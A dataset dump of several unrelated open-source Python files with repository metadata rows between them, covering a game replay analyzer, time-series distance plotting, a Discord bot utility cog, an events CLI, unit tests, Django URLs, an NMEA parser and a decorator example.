'RawReplayInitData': [(['raw','init_data'], 'getReplayInitData')],
'RawReplayTrackerEvents': [(['raw','tracker_events'], 'getReplayTrackerEvents')],
'RawReplayAttributesEvents': [(['raw','attributes_events'], 'getReplayAttributesEvents')],
'RawReplayGameEvents': [(['raw','game_events'], 'getReplayGameEvents')],
'RawReplayMessageEvents': [(['raw','message_events'], 'getReplayMessageEvents')],
'RawTalentSelectionGameEvents': [(['raw','selections'], 'getTalentSelectionGameEvents')],
}
class StormReplayAnalyzer:
@staticmethod
def getAllFieldMappingNames():
return named_field_mappings.keys()
@staticmethod
def getFieldMappingForNames(names):
fieldMapping = []
for name in names:
fieldMapping = fieldMapping + named_field_mappings.get(name, [])
return fieldMapping
def __init__(self, reader):
self.reader = reader
def analyze(self, fieldMappings=None):
if fieldMappings is None:
fieldMappings = defaultFieldMappings
retval = {}
for field in fieldMappings:
value = getattr(self, field[1])()
worklist = [(retval, field[0], value)]
while len(worklist) > 0:
workItem = worklist.pop()
obj = workItem[0]
keyPath = workItem[1]
value = workItem[2]
key = keyPath[0]
isArray = isinstance(key, (int, long))
if isArray and key >= len(obj):
obj.extend([None]*(key + 1 - len(obj)))
if len(keyPath) == 1:
obj[key] = value
elif isinstance(keyPath[1], basestring):
if isArray:
if obj[key] is None:
obj[key] = {}
obj = obj[key]
else:
obj = obj.setdefault(key, {})
worklist.append( (obj, keyPath[1:], value) )
elif isinstance(keyPath[1], list):
if isArray:
if obj[key] is None:
obj[key] = []
obj = obj[key]
else:
obj = obj.setdefault(key, [])
for index, element in enumerate(value):
worklist.append( (obj, [index] + keyPath[2:], element) )
elif isinstance(keyPath[1], dict):
if isArray:
if obj[key] is None:
obj[key] = {}
obj = obj[key]
else:
obj = obj.setdefault(key, {})
for dictKey in value:
if 0 == len(keyPath[1]):
keyToWrite = dictKey
elif keyPath[1].has_key(dictKey):
keyToWrite = keyPath[1][dictKey]
else:
continue
worklist.append( (obj, [keyToWrite] + keyPath[2:], value[dictKey]) )
else:
raise Exception('Key of invalid type: %s' % str(key))
return retval
def getReplayFileByteSize(self):
return self.reader.getReplayFileByteSize()
def getTalentSelectionGameEvents(self):
events = []
for event in self.reader.getReplayGameEvents():
if (event['_event'] != 'NNet.Game.SHeroTalentTreeSelectedEvent'):
continue
events.append(event)
return events
def getReplayProtocolVersion(self):
return self.reader.getReplayProtocolVersion()
def getReplayInitData(self):
return self.reader.getReplayInitData()
def getReplayAttributesEvents(self):
return self.reader.getReplayAttributesEvents()
def getReplayDetails(self):
return self.reader.getReplayDetails()
def getReplayTrackerEvents(self):
return self.reader.getReplayTrackerEvents()
def getReplayGameEvents(self):
return self.reader.getReplayGameEvents()
def getReplayMessageEvents(self):
return self.reader.getReplayMessageEvents()
def getTranslatedReplayAttributesEvents(self):
talentsReader = self.getTalentsReader()
return talentsReader.translate_replay_attributes_events(self.getReplayAttributesEvents())
def getGameDescription(self):
initData = self.getReplayInitData()
return initData['m_syncLobbyState']['m_gameDescription']
def getGameSpeed(self):
try:
return self.gameSpeed
except AttributeError:
self.gameSpeed = 0
return self.gameSpeed
def getTalentsReader(self):
try:
return self.talentsReader
except AttributeError:
replayVersion = self.reader.getReplayProtocolVersion()
try:
self.talentsReader = __import__('stormreplay.talents%s' % replayVersion, fromlist=['talents'])
except ImportError:
raise Exception('Unsupported StormReplay build number for talents: %i' % replayVersion)
return self.talentsReader
def getTalents(self):
try:
return self.talents
except AttributeError:
self.talents = [[] for _ in xrange(10)]
talentsReader = self.getTalentsReader()
generator = talentsReader.decode_game_events_talent_choices(self.reader.getReplayGameEvents(), self.getPlayersHeroChoiceArray())
for choice in generator:
self.talents[choice['_userid']].append({
'seconds': self.gameloopToSeconds(choice['_gameloop']),
'level': choice['m_level'],
'name': choice['m_talentName'],
'description': choice['m_talentDescription'],
'index': choice['m_talentIndex'],
})
return self.talents
def getTeamTalentTierTimes(self):
try:
return self.teamTalentTierTimes
except AttributeError:
teamTalentTierLevel = [[], []]
teamTalentTiersFirstPick = [[], []]
teamTalentTiersLastPick = [[], []]
players = self.getPlayers()
for playerIndex, playerTalentPicks in enumerate(self.getTalents()):
player = players[playerIndex]
for talentTierIndex, talentPick in enumerate(playerTalentPicks):
talentPickTime = talentPick['seconds']
teamIndex = player['m_teamId']
tiersFirstPick = teamTalentTiersFirstPick[teamIndex]
if (talentTierIndex >= len(tiersFirstPick)):
tiersFirstPick.append(talentPickTime)
elif (talentPickTime < tiersFirstPick[talentTierIndex]):
tiersFirstPick[talentTierIndex] = talentPickTime
tiersLastPick = teamTalentTiersLastPick[teamIndex]
if (talentTierIndex >= len(tiersLastPick)):
tiersLastPick.append(talentPickTime)
elif (talentPickTime > tiersLastPick[talentTierIndex]):
tiersLastPick[talentTierIndex] = talentPickTime
if (talentTierIndex >= len(teamTalentTierLevel[teamIndex])):
teamTalentTierLevel[teamIndex].append(talentPick['level'])
else:
teamTalentTierLevel[teamIndex][talentTierIndex] = talentPick['level']
self.teamTalentTierTimes = [[], []]
for teamIndex in xrange(2):
for talentTierIndex, level in enumerate(teamTalentTierLevel[teamIndex]):
self.teamTalentTierTimes[teamIndex].append({
'earliest': teamTalentTiersFirstPick[teamIndex][talentTierIndex],
'latest': teamTalentTiersLastPick[teamIndex][talentTierIndex],
'level': level,
})
return self.teamTalentTierTimes
def getTeamLevels(self):
try:
return self.teamLevels
except AttributeError:
teamTalentTierTimes = self.getTeamTalentTierTimes()
self.teamLevels = [[], []]
for teamIndex in xrange(2):
talentTierTimes = teamTalentTierTimes[teamIndex]
levelTimes = [0] * talentTierTimes[-1]['level']
for firstTier, nextTier in zip(talentTierTimes, talentTierTimes[1:]):
levelRange = nextTier['level'] - firstTier['level']
for level in xrange(firstTier['level'], nextTier['level']+1):
levelIndex = level-1
lerp = float(level - firstTier['level']) / levelRange
time = lerp * (nextTier['earliest'] - firstTier['earliest']) + firstTier['earliest']
levelTimes[levelIndex] = time
levelToTalentTierInfo = {}
for tierInfo in talentTierTimes:
levelToTalentTierInfo[str(tierInfo['level'])] = tierInfo
for levelIndex, time in enumerate(levelTimes):
level = levelIndex + 1
levelInfo = {
'level': levelIndex + 1,
'seconds': time,
'is_talent_tier': False,
}
if levelToTalentTierInfo.has_key(str(level)):
tierInfo = levelToTalentTierInfo[str(level)]
levelInfo['is_talent_tier'] = True
levelInfo['earliest_talent_picked_time'] = tierInfo['earliest']
levelInfo['latest_talent_picked_time'] = tierInfo['latest']
self.teamLevels[teamIndex].append(levelInfo)
return self.teamLevels
def getMapName(self):
try:
return self.mapName
except AttributeError:
self.mapName = self.reader.getReplayDetails()['m_title']['utf8']
return self.mapName
def getPlayersHeroChoiceArray(self):
try:
return self.playersHeroArray
except AttributeError:
self.playersHeroArray = [None] * 10
for i, player in enumerate(self.getPlayerSpawnInfo()):
self.playersHeroArray[i] = player['hero']
return self.playersHeroArray
# returns array indexed by user ID
def getPlayers(self):
try:
return self.players
except AttributeError:
self.players = [None] * 10
for i, player in enumerate(self.getReplayDetails()['m_playerList']):
#TODO: confirm that m_workingSetSlotId == i always
toon = player['m_toon']
player['m_toonId'] = "%i-%s-%i-%i" % (toon['m_region'], toon['m_programId'], toon['m_realm'], toon['m_id'])
player['m_name'] = player['m_name']['utf8']
player['m_controlPlayerId'] = i+1
self.players[i] = player
return self.players
# returns array indexed by user ID
def getPlayerSpawnInfo(self):
try:
return self.playerSpawnInfo
except AttributeError:
self.playerSpawnInfo = [None] * 10
playerIdToUserId = {}
for event in self.getReplayTrackerEvents():
if event['_event'] == 'NNet.Replay.Tracker.SPlayerSetupEvent':
playerIdToUserId[event['m_playerId']] = event['m_userId']
elif event['_event'] == 'NNet.Replay.Tracker.SUnitBornEvent' and (int(event['_gameloop']) > 0):
playerId = event['m_controlPlayerId']
if (playerIdToUserId.has_key(playerId)):
playerIndex = playerIdToUserId[playerId] # always playerId-1 so far, but this is safer
self.playerSpawnInfo[playerIndex] = {
'hero': event['m_unitTypeName']['utf8'],
'unit_tag': event['m_unitTag']
}
del playerIdToUserId[playerId]
if len(playerIdToUserId) == 0:
break
return self.playerSpawnInfo
def getMatchSpeed(self):
attributes = self.getTranslatedReplayAttributesEvents()
return attributes[16]['m_gameSpeed']
def getMatchType(self):
attributes = self.getTranslatedReplayAttributesEvents()
return attributes[16]['m_gameType']
def getHeroSelectionMode(self):
attributes = self.getTranslatedReplayAttributesEvents()
return attributes[16]['m_heroSelectionMode']
def getMatchUTCTimestamp(self):
try:
return self.utcTimestamp
except AttributeError:
self.utcTimestamp = (self.getReplayDetails()['m_timeUTC'] / 10000000) - 11644473600
return self.utcTimestamp
def getMatchLengthGameloops(self):
lastEvent = self.getReplayTrackerEvents()[-1]
return lastEvent['_gameloop']
def getMatchLengthSeconds(self):
return self.gameloopToSeconds(self.getMatchLengthGameloops())
def gameloopToSeconds(self, gameloop):
return gameloop / 16.0
def gameloopToTimestamp(self, gameloop):
return self.getMatchUTCTimestamp() + _gameloop / 16.0
def getChat(self):
try:
return self.chat
except AttributeError:
self.chat = []
for messageEvent in self.getReplayMessageEvents():
if (messageEvent['_event'] != 'NNet.Game.SChatMessage'):
continue
userId = messageEvent['_userid']['m_userId']
chatData = {
't': self.gameloopToTimestamp(messageEvent['_gameloop']),
'user': userId,
'msg': messageEvent['m_string']['utf8'],
}
self.chat.append(chatData)
return self.chat
| 40.978947 | 140 | 0.56075 | 13,636 | 0.875674 | 0 | 0 | 302 | 0.019394 | 0 | 0 | 2,603 | 0.167159 |
d35a053d65915bab9a6060e5f2a46eeac4fd7b25 | 6,214 | py | Python | sktime/_contrib/_plot_path.py | Vasudeva-bit/sktime | 0d031862ac85d20e75434a1b4ab4117bdd544ffe | [
"BSD-3-Clause"
] | null | null | null | sktime/_contrib/_plot_path.py | Vasudeva-bit/sktime | 0d031862ac85d20e75434a1b4ab4117bdd544ffe | [
"BSD-3-Clause"
] | null | null | null | sktime/_contrib/_plot_path.py | Vasudeva-bit/sktime | 0d031862ac85d20e75434a1b4ab4117bdd544ffe | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
import matplotlib.colors as colorplt
import matplotlib.pyplot as plt
import numpy as np
from sktime.distances._distance import distance_alignment_path, pairwise_distance
gray_cmap = colorplt.LinearSegmentedColormap.from_list("", ["#c9cacb", "white"])
def _path_mask(cost_matrix, path, ax, theme=gray_cmap):
plot_matrix = np.zeros_like(cost_matrix)
max_size = max(cost_matrix.shape)
for i in range(max_size):
for j in range(max_size):
if (i, j) in path:
plot_matrix[i, j] = 1.0
elif cost_matrix[i, j] == np.inf:
plot_matrix[i, j] = 0.0
else:
plot_matrix[i, j] = 0.25
for i in range(max_size):
for j in range(max_size):
c = cost_matrix[j, i]
ax.text(i, j, str(round(c, 2)), va="center", ha="center", size=10)
ax.text(i, j, str(round(c, 2)), va="center", ha="center", size=10)
ax.matshow(plot_matrix, cmap=theme)
def _pairwise_path(x, y, metric):
pw_matrix = pairwise_distance(x, y, metric=metric)
path = []
for i in range(pw_matrix.shape[0]):
for j in range(pw_matrix.shape[1]):
if i == j:
path.append((i, j))
return path, pw_matrix.trace(), pw_matrix
def _plot_path(
x: np.ndarray,
y: np.ndarray,
metric: str,
dist_kwargs: dict = None,
title: str = "",
plot_over_pw: bool = False,
):
if dist_kwargs is None:
dist_kwargs = {}
try:
path, dist, cost_matrix = distance_alignment_path(
x, y, metric=metric, return_cost_matrix=True, **dist_kwargs
)
if metric == "lcss":
_path = []
for tup in path:
_path.append(tuple(x + 1 for x in tup))
path = _path
if plot_over_pw is True:
if metric == "lcss":
pw = pairwise_distance(x, y, metric="euclidean")
cost_matrix = np.zeros_like(cost_matrix)
cost_matrix[1:, 1:] = pw
else:
pw = pairwise_distance(x, y, metric="squared")
cost_matrix = pw
except NotImplementedError:
path, dist, cost_matrix = _pairwise_path(x, y, metric)
plt.figure(1, figsize=(8, 8))
x_size = x.shape[0]
# definitions for the axes
left, bottom = 0.01, 0.1
w_ts = h_ts = 0.2
left_h = left + w_ts + 0.02
width = height = 0.65
bottom_h = bottom + height + 0.02
rect_s_y = [left, bottom, w_ts, height]
rect_gram = [left_h, bottom, width, height]
rect_s_x = [left_h, bottom_h, width, h_ts]
ax_gram = plt.axes(rect_gram)
ax_s_x = plt.axes(rect_s_x)
ax_s_y = plt.axes(rect_s_y)
_path_mask(cost_matrix, path, ax_gram)
ax_gram.axis("off")
ax_gram.autoscale(False)
# ax_gram.plot([j for (i, j) in path], [i for (i, j) in path], "w-",
# linewidth=3.)
ax_s_x.plot(np.arange(x_size), y, "b-", linewidth=3.0, color="#818587")
ax_s_x.axis("off")
ax_s_x.set_xlim((0, x_size - 1))
ax_s_y.plot(-x, np.arange(x_size), "b-", linewidth=3.0, color="#818587")
ax_s_y.axis("off")
ax_s_y.set_ylim((0, x_size - 1))
ax_s_x.set_title(title, size=10)
return plt
def _plot_alignment(x, y, metric, dist_kwargs: dict = None, title: str = ""):
if dist_kwargs is None:
dist_kwargs = {}
try:
path, dist, cost_matrix = distance_alignment_path(
x, y, metric=metric, return_cost_matrix=True, **dist_kwargs
)
except NotImplementedError:
path, dist, cost_matrix = _pairwise_path(x, y, metric)
plt.figure(1, figsize=(8, 8))
plt.plot(x, "b-", color="black")
plt.plot(y, "g-", color="black")
for positions in path:
try:
plt.plot(
[positions[0], positions[1]],
[x[positions[0]], y[positions[1]]],
"--",
color="#818587",
)
except:
continue
plt.legend()
plt.title(title)
plt.tight_layout()
return plt
if __name__ == "__main__":
x = np.array(
[
-0.7553383207,
0.4460987596,
1.197682907,
0.1714334808,
0.5639929213,
0.6891222874,
1.793828873,
0.06570866314,
0.2877381702,
1.633620422,
]
)
y = np.array(
[
0.01765193577,
1.536784164,
-0.1413292622,
-0.7609346135,
-0.1767363331,
-2.192007072,
-0.1933165696,
-0.4648166839,
-0.9444888843,
-0.239523623,
]
)
import os
def _save_plt(plt):
plt[0].savefig(f"{metric_path}/{plt[1]}")
plt[0].cla()
plt[0].clf()
if not os.path.exists("./plots"):
os.makedirs("./plots")
metrics = [
"euclidean",
"erp",
"edr",
"lcss",
"squared",
"dtw",
"ddtw",
"wdtw",
"wddtw",
"msm",
]
# metrics = ['lcss']
for metric in metrics:
metric_path = f"./plots/{metric}"
if not os.path.exists(metric_path):
os.makedirs(metric_path)
save_plt(
(
_plot_path(x, y, metric, {"epsilon": 1.0}),
f"{metric}_path_through_cost_matrix",
)
)
_save_plt(
(
_plot_path(x, y, metric, {"window": 0.2, "epsilon": 1.0}),
f"{metric}_path_through_20_cost_matrix",
)
)
if metric == "wdtw":
g_val = [0.2, 0.3]
for g in g_val:
file_save = str(g).split(".")
_save_plt(
(
_plot_path(x, y, metric, {"g": g}),
f"{metric}_path_through_g{file_save[1]}_cost_matrix",
)
)
_save_plt((_plot_alignment(x, y, metric), f"{metric}_alignment"))
_save_plt(
(_plot_alignment(x, y, metric, {"window": 0.2}), f"{metric}_alignment_20")
)
| 27.254386 | 86 | 0.516254 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 682 | 0.109752 |
d35ae302dc71c9bbf5223948369169ce172e3f51 | 5,310 | py | Python | utils/rtutil.py | RT-Team/RT-Lib | 686c3632f4283c56b5983d2ddc20bd94f7ef2ba4 | [
"MIT"
] | null | null | null | utils/rtutil.py | RT-Team/RT-Lib | 686c3632f4283c56b5983d2ddc20bd94f7ef2ba4 | [
"MIT"
] | null | null | null | utils/rtutil.py | RT-Team/RT-Lib | 686c3632f4283c56b5983d2ddc20bd94f7ef2ba4 | [
"MIT"
] | null | null | null | # RT Ext - Useful Util
# 注意:普通のエクステンションとは違います。
import asyncio
from json import dumps
from time import time
import discord
from aiofile import async_open
from discord.ext import commands, tasks
class RtUtil(commands.Cog):
def __init__(self, bot):
self.bot = bot
self.data = {
"list_embed": {}
}
self.ARROW_EMOJI = ["◀️", "▶️"]
self.now = time()
self.save_queue = []
self.list_embed_timeout_loop.start()
def list_embed(self, member_id: int, embeds: list[discord.Embed],
timeout: int = 60, anyone: bool = False
) -> list[discord.Embed, list[str]]:
self.data["list_embed"][member_id] = {
"embeds": [embed.to_dict() for embed in embeds],
"timeout": self.now + timeout,
"anyone": anyone
}
return embeds[0], self.ARROW_EMOJI
@tasks.loop(seconds=5)
async def list_embed_timeout_loop(self):
for user_id in self.data["list_embed"]:
if self.now > self.data["list_embed"][user_id]["timeout"]:
del self.data["list_embed"][user_id]
async def list_embed_reaction_task(self, reaction, user):
# === list embed === #
if (not reaction.message.embeds
or str(reaction.emoji) not in self.ARROW_EMOJI
or reaction.message.author.id != self.bot.user.id
or user.id not in self.data["list_embed"]):
return
embed = reaction.message.embeds[0]
now_embed = embed.to_dict()
for user_id in self.data["list_embed"]:
if (now_embed in self.data["list_embed"][user.id]["embeds"]
and user_id == user.id):
data = self.data["list_embed"][user.id]
now = data["embeds"].index(now_embed)
next_page = 0
if str(reaction.emoji) == self.ARROW_EMOJI[0]:
next_page = now - 1
elif str(reaction.emoji) == self.ARROW_EMOJI[1]:
next_page = now + 1
if len(data["embeds"]) != next_page and now != 0:
embed = data["embeds"][next_page]
await reaction.message.edit(embed=embed)
break
try:
await reaction.message.remove_reaction(str(reaction.emoji), user)
except Exception:
pass
@commands.Cog.listener()
async def on_reaction_add(self, reaction, user):
await self.list_embed_reaction_task(reaction, user)
def unload_cog(self):
self.list_embed_timeout_loop.cancel()
# Webhook Sender
async def send(channel, author, content=None, embeds=None,
files=None, wait=False, name='RT-Tool'):
wb = discord.utils.get(await channel.webhooks(), name=name)
wb = wb if wb else await channel.create_webhook(name=name)
return await wb.send(wait=wait, username=author.name,
avatar_url=author.avatar_url, content=content,
embeds=embeds, files=files)
async def not_author_send(channel, author_name, icon_url, content=None,
embeds=None, files=None, wait=False, name='RT-Tool'):
wb = discord.utils.get(await channel.webhooks(), name=name)
wb = wb if wb else await channel.create_webhook(name=name)
return await wb.send(wait=wait, username=author_name, avatar_url=icon_url,
content=content, embeds=embeds, files=files)
# easy_embed
def easy_embed(content, color=discord.Embed.Empty):
es = ">>"
spl = content.splitlines()
title = spl[0][len(es):]
desc, fields = [], {}
footer = None if ';;' not in spl[-1] else spl[-1][2:]
if footer:
spl.pop(-1)
spl.pop(0)
f = None
for c in spl:
if c == "":
continue
if c[0] == '<':
f = c[1:] if '!' != c[1] else c[2:]
fields[f] = {'i': True if '!' != c[1] else False, 'c': []}
continue
if f:
fields[f]['c'].append(c)
continue
desc.append(c)
e = discord.Embed(
title=title,
description='\n'.join(desc),
color=color
)
for f in fields.keys():
e.add_field(
name=f,
value='\n'.join(fields[f]['c']),
inline=fields[f]['i']
)
if footer:
e.set_footer(text=footer)
return e
# Role TOOL
def check_int(v):
try:
int(v)
except BaseException:
return False
else:
return True
def has_roles(member, roles):
return any(bool(discord.utils.get(
member.roles, id=role.id)) for role in roles)
def role2obj(guild, arg):
roles_raw, roles = arg.split(','), []
for role in roles_raw:
if '@' in role:
roles.append(guild.get_role(int(role[3:-1])))
elif check_int(role):
roles.append(guild.get_role(int(role)))
else:
roles.append(discord.utils.get(guild.roles, name=role))
return roles
class Roler(discord.ext.commands.Converter):
async def convert(self, ctx, arg):
return role2obj(ctx.guild, arg)
def similer(b, a, m):
return any(a[i:i + m] in b for i in range(len(a) - m))
def setup(bot):
return RtUtil(bot)
| 30.170455 | 79 | 0.56403 | 2,568 | 0.479104 | 0 | 0 | 376 | 0.070149 | 2,513 | 0.468843 | 404 | 0.075373 |
d35b8f5e002babab9cbdfd8130a669a4f050c35d | 3,230 | py | Python | asclepias_broker/events/cli.py | ChiaraBi/asclepias-broker | 793e2634591eed926000b19bd342f044b29bedcc | [
"BSD-3-Clause"
] | null | null | null | asclepias_broker/events/cli.py | ChiaraBi/asclepias-broker | 793e2634591eed926000b19bd342f044b29bedcc | [
"BSD-3-Clause"
] | null | null | null | asclepias_broker/events/cli.py | ChiaraBi/asclepias-broker | 793e2634591eed926000b19bd342f044b29bedcc | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
#
# Copyright (C) 2018 CERN.
#
# Asclepias Broker is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""Events CLI."""
from __future__ import absolute_import, print_function
import datetime
import json
import click
from flask.cli import with_appcontext
from flask import current_app
from ..utils import find_ext
from .api import EventAPI
from ..graph.tasks import process_event
from .models import Event, EventStatus
@click.group()
def events():
"""Event CLI commands."""
@events.command('load')
@click.argument(
'jsondir_or_file',
type=click.Path(exists=True, dir_okay=True, resolve_path=True))
@click.option('--no-index', default=False, is_flag=True)
@click.option('-e', '--eager', default=False, is_flag=True)
@with_appcontext
def load(jsondir_or_file: str, no_index: bool = False, eager: bool = False):
"""Load events from a directory."""
files = find_ext(jsondir_or_file, '.json')
with click.progressbar(files) as bar_files:
for fn in bar_files:
with open(fn, 'r') as fp:
data = json.load(fp)
try:
EventAPI.handle_event(data, no_index=no_index, eager=eager)
except ValueError:
pass
@events.command('rerun')
@click.option('-i','--id', default=None)
@click.option('-a', '--all', default=False, is_flag=True)
@click.option('-e', '--errors', default=False, is_flag=True)
@click.option('-p', '--processing', default=False, is_flag=True)
@click.option('--no-index', default=False, is_flag=True)
@click.option('--eager', default=False, is_flag=True)
@with_appcontext
def rerun(id: str = None, all: bool = False, errors: bool = True, processing: bool = False, no_index: bool = False, eager: bool = False):
"""Rerun failed or stuck events."""
if id:
rerun_id(id, no_index, eager)
return
if all:
errors = True
processing = True
if processing:
rerun_processing(no_index, eager)
rerun_new(no_index, eager)
if errors:
rerun_errors(no_index, eager)
def rerun_id(id:str, no_index: bool, eager:bool = False):
event = Event.get(id)
if event:
EventAPI.rerun_event(event, no_index=no_index, eager=eager)
def rerun_processing(no_index: bool, eager:bool = False):
yesterday = datetime.datetime.now() - datetime.timedelta(days = 1)
resp = Event.query.filter(Event.status == EventStatus.Processing, Event.created < str(yesterday)).all()
for event in resp:
EventAPI.rerun_event(event, no_index=no_index, eager=eager)
def rerun_new(no_index: bool, eager:bool = False):
yesterday = datetime.datetime.now() - datetime.timedelta(days = 1)
resp = Event.query.filter(Event.status == EventStatus.New, Event.created < str(yesterday)).all()
for event in resp:
EventAPI.rerun_event(event, no_index=no_index, eager=eager)
def rerun_errors(no_index: bool, eager:bool = False):
resp = Event.query.filter(Event.status == EventStatus.Error).all()
for event in resp:
EventAPI.rerun_event(event, no_index=no_index, eager=eager) | 35.494505 | 137 | 0.671207 | 0 | 0 | 0 | 0 | 1,612 | 0.499071 | 0 | 0 | 451 | 0.139628 |
d35eac2b776e4340c0c28e8d9b2cac414a8a38f1 | 2,620 | py | Python | test/noise_transformation_test.py | DecodEPFL/eiv-grid-id | 093a0f6f3537ee2d4003b6af6a10caaca986fa7a | [
"CC-BY-4.0"
] | 1 | 2021-07-13T07:26:23.000Z | 2021-07-13T07:26:23.000Z | test/noise_transformation_test.py | DecodEPFL/eiv-grid-id | 093a0f6f3537ee2d4003b6af6a10caaca986fa7a | [
"CC-BY-4.0"
] | null | null | null | test/noise_transformation_test.py | DecodEPFL/eiv-grid-id | 093a0f6f3537ee2d4003b6af6a10caaca986fa7a | [
"CC-BY-4.0"
] | 2 | 2022-02-22T17:14:38.000Z | 2022-02-25T10:29:35.000Z | import numpy as np
import pytest
from src.models.noise_transformation import average_true_var_real, average_true_var_imag, average_true_cov, \
average_true_noise_covariance, naive_noise_covariance
test_cases_real_variance = [
(2 - 3j, 0, 0, 0),
(0, 1, 1, np.exp(-2) * (2 * np.cosh(2) - np.cosh(1))),
(2j, 1, 1, 4 * np.exp(-2) * (np.sinh(2) - np.sinh(1)) + np.exp(-2) * (2 * np.sinh(2) - np.sinh(1))),
(-2j, 1, 1, 4 * np.exp(-2) * (np.sinh(2) - np.sinh(1)) + np.exp(-2) * (2 * np.sinh(2) - np.sinh(1))),
]
test_cases_imag_variance = [
(4 - 3j, 0, 0, 0),
(0, 1, 1, np.exp(-2) * (2 * np.sinh(2) - np.sinh(1))),
(2j, 1, 1, 4 * np.exp(-2) * (np.cosh(2) - np.cosh(1)) + np.exp(-2) * (2 * np.cosh(2) - np.cosh(1))),
(-2j, 1, 1, 4 * np.exp(-2) * (np.cosh(2) - np.cosh(1)) + np.exp(-2) * (2 * np.cosh(2) - np.cosh(1))),
]
test_cases_covariance = [
(4 - 3j, 0, 0, 0),
(0, 1, 1, 0),
(2j, 1, 1, 0),
(-2j, 1, 1, 0),
(np.sqrt(2) * (1 + 1j), 1, 1, 0.5 * np.exp(-4) * (1 + 5 * (1 - np.exp(1)))),
]
@pytest.mark.parametrize("m,sd_magnitude,sd_phase,expected", test_cases_real_variance)
def test_variance_of_real_noise(m, sd_magnitude, sd_phase, expected):
res = average_true_var_real(m, sd_magnitude, sd_phase)
np.testing.assert_allclose(res, expected)
@pytest.mark.parametrize("m,sd_magnitude,sd_phase,expected", test_cases_imag_variance)
def test_variance_of_imag_noise(m, sd_magnitude, sd_phase, expected):
res = average_true_var_imag(m, sd_magnitude, sd_phase)
np.testing.assert_allclose(res, expected)
@pytest.mark.parametrize("m,sd_magnitude,sd_phase,expected", test_cases_covariance)
def test_covariance_of_noise(m, sd_magnitude, sd_phase, expected):
res = average_true_cov(m, sd_magnitude, sd_phase)
np.testing.assert_allclose(res, expected, rtol=0, atol=1e-10)
def test_cartesian_noise_covariance_matrix():
sd_magnitude = 1
sd_phase = 1
measurement = np.zeros(2)
res = average_true_noise_covariance(measurement, sd_magnitude, sd_phase)
expected = np.diag(
[np.exp(-2) * (2 * np.cosh(2) - np.cosh(1))] * 2 + [np.exp(-2) * (2 * np.sinh(2) - np.sinh(1))] * 2)
np.testing.assert_allclose(res.todense(), expected)
def test_naive_covariance_matrix():
sd_magnitude = 1
sd_phase = 1
measurement = np.array([0, 1j])
expected = np.array([
[1, 0, 0, 0],
[0, 1, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 1],
], dtype=np.float)
res = naive_noise_covariance(measurement, sd_magnitude, sd_phase)
np.testing.assert_allclose(res.todense(), expected, rtol=0, atol=1e-10)
| 37.428571 | 109 | 0.630153 | 0 | 0 | 0 | 0 | 792 | 0.30229 | 0 | 0 | 102 | 0.038931 |
d35f6d432e8bf0619040f90837d1e5c82d21a5a6 | 257 | py | Python | forherobj_app/urls.py | chaitphani/ForHerObj-repo | 7d4a0f73e585bef10f92bced0d34b117ca8e60b1 | [
"MIT"
] | null | null | null | forherobj_app/urls.py | chaitphani/ForHerObj-repo | 7d4a0f73e585bef10f92bced0d34b117ca8e60b1 | [
"MIT"
] | null | null | null | forherobj_app/urls.py | chaitphani/ForHerObj-repo | 7d4a0f73e585bef10f92bced0d34b117ca8e60b1 | [
"MIT"
] | null | null | null | from django.urls import path
from . import views
urlpatterns = [
path('', views.home, name='home'),
path('login', views.login_fun, name='login'),
path('signup', views.signup, name='signup'),
path('logout', views.logout, name='logout'),
] | 21.416667 | 49 | 0.642023 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 54 | 0.210117 |
d3604b03b5b7d1f10584723f9cdd33c78d84a311 | 494 | py | Python | 1138_05_19-nmea.py | nchaparr/Geospatial-Analysis-with-Python | 6e0d1ff429baa4205c63bf842ab950ed4176536f | [
"CC0-1.0"
] | null | null | null | 1138_05_19-nmea.py | nchaparr/Geospatial-Analysis-with-Python | 6e0d1ff429baa4205c63bf842ab950ed4176536f | [
"CC0-1.0"
] | null | null | null | 1138_05_19-nmea.py | nchaparr/Geospatial-Analysis-with-Python | 6e0d1ff429baa4205c63bf842ab950ed4176536f | [
"CC0-1.0"
] | null | null | null | """Parse NMEA GPS strings"""
from pynmea.streamer import NMEAStream
nmeaFile = open("nmea.txt")
nmea_stream = NMEAStream(stream_obj=nmeaFile)
next_data = nmea_stream.get_objects()
nmea_objects = []
while next_data:
nmea_objects += next_data
next_data = nmea_stream.get_objects()
# The NMEA stream is parsed!
# Let's loop through the
# Python object types:
for nmea_ob in nmea_objects:
if hasattr(nmea_ob, "lat"):
print "Lat/Lon: (%s, %s)" % (nmea_ob.lat, nmea_ob.lon)
| 30.875 | 59 | 0.712551 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 140 | 0.283401 |
d3606a910d1904ced1fc96fd6f2ed700d8ae5f9d | 852 | py | Python | languages/python/src/concepts/P104_Decorators_ClassBasedDecorators.py | vikash-india/DeveloperNotes2Myself | fe277a3c52f73884863f2f72b237365b27a8c882 | [
"MIT"
] | 2 | 2019-05-25T10:09:00.000Z | 2022-03-11T09:06:23.000Z | languages/python/src/concepts/P104_Decorators_ClassBasedDecorators.py | vikash-india/DeveloperNotes2Myself | fe277a3c52f73884863f2f72b237365b27a8c882 | [
"MIT"
] | 2 | 2020-03-31T04:30:17.000Z | 2020-10-30T07:54:28.000Z | languages/python/src/concepts/P104_Decorators_ClassBasedDecorators.py | vikash-india/DeveloperNotes2Myself | fe277a3c52f73884863f2f72b237365b27a8c882 | [
"MIT"
] | 4 | 2019-07-12T13:18:56.000Z | 2021-11-17T08:04:55.000Z | # Description: Class Based Decorators
"""
### Note
* If you want to maintain some sort of state and/or just make your code more confusing, use class based decorators.
"""
class ClassBasedDecorator(object):
def __init__(self, function_to_decorate):
print("INIT ClassBasedDecorator")
self.function_to_decorate = function_to_decorate
def __call__(self, *args, **kwargs):
print("CALL ClassBasedDecorator")
return self.function_to_decorate(*args, **kwargs)
# Call Class Based Decorator
@ClassBasedDecorator
def function_1(*args):
for arg in args:
print(arg)
def function_2(*args):
for arg in args:
print(arg)
if __name__ == '__main__':
function_1(1, 2, 3)
# Call Class Based Decorator - Alternate way
function_2 = ClassBasedDecorator(function_2)
function_2(1, 2, 3)
